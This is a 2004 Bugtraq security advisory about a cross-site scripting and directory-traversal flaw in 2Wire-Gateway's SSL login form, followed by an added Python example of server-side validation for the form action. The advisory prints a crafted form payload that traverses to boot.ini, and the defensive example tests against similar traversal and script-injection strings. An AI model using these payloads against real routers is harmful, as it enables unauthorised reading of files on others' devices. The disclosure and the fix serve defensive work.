2Wire-Gateway Cross Site Scripting and Directory Traversal bug in SSL Form
From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/20/04
To: <bugtraq@securityfocus.com>
Date: Tue, 20 Jan 2004 23:14:03 +0200
#######################################################################
Application: 2Wire-Gateway/WebGateway
Vendor: http://www.2wire.com
Versions: All
Platforms: Windows
Bug: Cross Site Scripting and Directory traversal bug in SSL Form Authentication
Risk: high
Exploitation: Remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
2Wire is a communication company that sells Internet and network-related
devices, such as routers. The most common web server on 2Wire routers is
"2Wire-Gateway". It includes SSL (Secure Sockets Layer) form authentication.
#######################################################################
======
2) Bug
======
The SSL (Secure Sockets Layer) form authentication has an XSS (Cross Site
Scripting) flaw that allows an attacker to change the form's action
parameters. An attacker is able to inject script and URLs into the form's
action and thereby traverse directories on the server.
This allows him to see and download any file on the remote system, provided
he knows the path.
However, exploiting this vulnerability is very hard because the attacker has
to connect to the target through the browser and accept the SSL connection;
the exploit is very hard to reproduce.
#######################################################################
===========
3) The Code
===========
<form name="wralogin" method="get"
action="http://
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
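Added example, not part of the original advisory and not 2Wire's code: one way a server could validate a value before reflecting it into the login form's action, covering the script injection and "/../" traversal described in section 2. The allowlisted paths, the function names and the host gateway.example are assumptions made for illustration.

```python
import html
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed allowlist: the only local paths the login form may submit to.
ALLOWED_ACTIONS = {"/login", "/management/login"}
DEFAULT_ACTION = "/login"


def safe_form_action(requested: str) -> str:
    """Return an allowlisted local path for the form action, else the default."""
    # Decode a bounded number of times so %2e%2e and %252e%252e are seen in the clear.
    decoded = requested
    for _ in range(3):
        decoded = unquote(decoded)
    if unquote(decoded) != decoded:
        return DEFAULT_ACTION  # still encoded after three rounds: refuse
    decoded = decoded.replace("\\", "/")
    # Characters that could close the attribute or split the response.
    if any(ch in decoded for ch in "<>\"'\x00\r\n"):
        return DEFAULT_ACTION
    try:
        parts = urlsplit(decoded)
    except ValueError:
        return DEFAULT_ACTION
    # A scheme or host means the action would point away from the local form handler.
    if parts.scheme or parts.netloc:
        return DEFAULT_ACTION
    # Reject traversal segments outright instead of silently resolving them.
    if ".." in parts.path.split("/"):
        return DEFAULT_ACTION
    path = posixpath.normpath("/" + parts.path.lstrip("/"))
    return path if path in ALLOWED_ACTIONS else DEFAULT_ACTION


def render_login_form(requested: str) -> str:
    """Build the login form with a validated, attribute-escaped action."""
    action = html.escape(safe_form_action(requested), quote=True)
    # POST keeps the password out of the URL, unlike method="get".
    return (f'<form name="wralogin" method="post" action="{action}">'
            '<input type="password" name="password" value=""></form>')


if __name__ == "__main__":
    # Constructed inputs: one legitimate value and the patterns from the advisory.
    for value in ["/management/./login", "http://gateway.example/../boot.ini",
                  "%252e%252e/boot.ini", '"><script>alert(1)</script>']:
        print(repr(value), "->", safe_form_action(value))
```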